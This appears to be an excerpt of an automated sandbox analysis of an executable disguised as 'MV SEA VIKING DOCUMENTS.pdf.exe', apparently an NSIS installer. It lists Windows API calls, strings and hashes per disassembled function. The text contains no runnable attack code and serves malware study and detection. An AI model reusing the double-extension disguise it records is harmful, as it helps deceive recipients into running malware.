                                                                                                                                                                                                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00000000,00425A20,76F723A0), ref: 004066A8
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                • API String ID: 4260037668-2768826128
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 589700163-2977677972
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404E77
                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                                • MulDiv.KERNEL32(000982BC,00000064,00099830), ref: 00402FDC
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 714912BB: GlobalAlloc.KERNELBASE(00000040,?,714912DB,?,7149137F,00000019,714911CA,-000000A0), ref: 714912C5
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71492743
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71492778
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 714925C2
                                                                                                                                                                                                                                  • Part of subcall function 714912CC: lstrcpynW.KERNEL32(00000000,?,7149137F,00000019,714911CA,-000000A0), ref: 714912DC
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 71492548
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71492563
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                                                                                                                • Opcode ID: 02c703e46bb4d5839e3cc5474cc0937b94ba80f523ca51a9c53a0e3698f0fbc4
                                                                                                                                                                                                                                • Instruction ID: 75e49c14ba34f87078ed2258ca6ad0f489aa80aa0756ba1bff03cdfa3cab04af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02c703e46bb4d5839e3cc5474cc0937b94ba80f523ca51a9c53a0e3698f0fbc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2141B1B1008306EFD725DF25D844E667FF8FB64320F11492EE447DA681E730A549CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                                                                • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2584051700-0
                                                                                                                                                                                                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,714922D8,?,00000808), ref: 714916D5
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,714922D8,?,00000808), ref: 714916DC
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,714922D8,?,00000808), ref: 714916F0
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(714922D8,00000000), ref: 714916F7
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71491700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                                                                                                                • Opcode ID: 4523d29ab8c27e00e4bc58600403cf67c3413113a2fb8392024034e1d384ff87
                                                                                                                                                                                                                                • Instruction ID: bb16fda867d8f11a82ecbdc258fd610f3737527f48055b35ba6d939bafe51535
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4523d29ab8c27e00e4bc58600403cf67c3413113a2fb8392024034e1d384ff87
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7F0ACB320A1387BD6211AA7CD4CDABBE9CDF9B2F5B250215F628A219086615D01D7F1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp, xrefs: 00405EB8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 3213498283-4141617732
